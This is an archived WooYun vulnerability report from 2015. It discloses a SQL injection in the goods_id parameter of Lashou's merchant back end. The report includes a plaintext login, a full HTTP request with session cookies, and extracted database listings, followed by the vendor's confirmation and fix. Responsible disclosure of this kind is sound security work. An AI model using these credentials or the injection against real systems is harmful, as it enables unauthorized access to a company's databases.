乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-29: 细节已通知厂商并且等待厂商处理中 2015-04-29: 厂商已经确认,细节仅向厂商公开 2015-05-09: 细节向核心白帽子及相关领域专家公开 2015-05-19: 厂商已经修复漏洞并主动公开,细节向公众公开
拉手网某商户管理后台漏洞影响近30数据库换了一种方式,果然好使多了
站点:cg.lashou.com参数:goods_id登录账号密码:lilong lilong
GET /new_index.php?class=Search&act=no_consume&goods_id=422424 HTTP/1.1Host: cg.lashou.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: __utma=1.1552198193.1421975716.1430225450.1430271215.9; __utmz=1.1430225450.8.7.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=lashou; client_key=1426898239w7c7e9556fa468f4d67a13; city_b=440606; show_index_qr=1; sp_client_down=1; ThinkID=aum20cndqfqenoq35rav0mvq55; sp_show_message=1; sp_=puokhukg7g1ulosnr054021rh0; __utmc=1; visit_city_string=beijing; __utma=19584938.798026229.1430227145.1430227145.1430227145.1; __utmc=19584938; __utmz=19584938.1430227145.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.11.9.1430271409496; s_id=puokhukg7g1ulosnr054021rh0; s_md=3ab7a1a457e0a170646b683e16f41435X-Forwarded-For: 8.8.8.8Connection: keep-alive
得到一些东西:
back-end DBMS: MySQL >= 5.0.0current database: 'thinklasho'current user: '[email protected].%.%'available databases [27]:[*] address[*] datamining[*] dating[*] game_togo[*] hotel[*] house[*] hui[*] information_schema[*] lashoblog[*] lashou_activity[*] lashou_dianping[*] lashou_hotel[*] lashou_hui[*] lashou_jd[*] lashou_mall[*] lashou_sem[*] lashou_stat[*] lashou_stores[*] logs[*] myapp[*] mysql[*] nantong[*] performance_schema[*] stats[*] test[*] thinklasho[*] ywb
危害等级:高
漏洞Rank:16
确认时间:2015-04-29 13:59
谢谢您的报告,问题已经告知研发,漏洞正在修复.万谢.
2015-05-19:完成修复.